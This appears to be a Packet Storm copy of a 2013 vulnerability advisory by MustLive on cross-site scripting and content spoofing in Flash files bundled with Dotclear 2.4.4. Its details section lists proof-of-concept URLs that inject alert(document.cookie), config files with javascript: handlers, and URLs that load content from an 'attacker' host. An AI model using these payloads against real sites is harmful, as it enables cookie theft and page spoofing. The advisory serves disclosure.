exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dotclear 2.4.4 Cross Site Scripting / Content Spoofing

Dotclear 2.4.4 Cross Site Scripting / Content Spoofing
Posted Apr 13, 2013
Authored by MustLive

CMS Dotclear version 2.4.4 suffers from cross site scripting and content spoofing vulnerabilities.

tags | exploit, spoof, vulnerability, xss
advisories | CVE-2012-3414
SHA-256 | 625cc001772f2b42ce6045d05996c1d2b54a79d66309e300357424fc1b5ada2f
Download | Favorite | View

Dotclear 2.4.4 Cross Site Scripting / Content Spoofing

Change Mirror Download
Hello list!

These are Cross-Site Scripting and Content Spoofing vulnerabilities in
Dotclear.

CMS Dotclear has three vulnerable flash-files: swfupload.swf, player_flv.swf
and player_mp3.swf.

File swfupload.swf it's Swfupload. I've wrote about vulnerabilities in
Swfupload in November 2012 (http://securityvulns.ru/docs28759.html).

SecurityVulns ID: 12719
CVE: CVE-2012-3414

File player_flv.swf it's FLV Player. I've wrote about vulnerabilities in FLV
Player in August 2011 (http://securityvulns.ru/docs26894.html).

SecurityVulns ID: 11877

File player_mp3.swf it's mp3 player similar to FLV Player (made by the same
developer).

-------------------------
Affected products:
-------------------------

Vulnerable are Dotclear 2.4.4 (and partly 2.5) and previous versions.

In version Dotclear 2.5 the developers fixed vulnerabilities but not
effectively: 1) all three vulnerable flash-files are exist in engine (so no
need to take them from repository or from web sites for using in own
projects, since these are vulnerable versions of flashes); 2) the developers
changed swfupload.swf in Dotclear 2.5 on previous version, but this one is
still vulnerable to all XSS and CS holes; 3) for of direct access to
flash-files (via .htaccess), to prevent using of their vulnerabilities,
works only in Apache, but not in other web servers (so web sites on them are
vulnerable).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)

http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

File xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

Code will execute after click. It's strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml

http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt

http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv

http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml

http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt

http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

------------
Timeline:
------------ 

2013.01.10 - announced at my site.
2013.01.14 - informed developers about vulnerabilities in all three flashes.
2013.03.16 - released Dotclear 2.5.
2013.04.10-12 - wrote 4 additional letters to developers with reminding,
with drawing attention on ineffective fixing of the holes and with
persuading them to fix the holes correctly.
2013.04.12 - disclosed at my site (http://websecurity.com.ua/6255/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close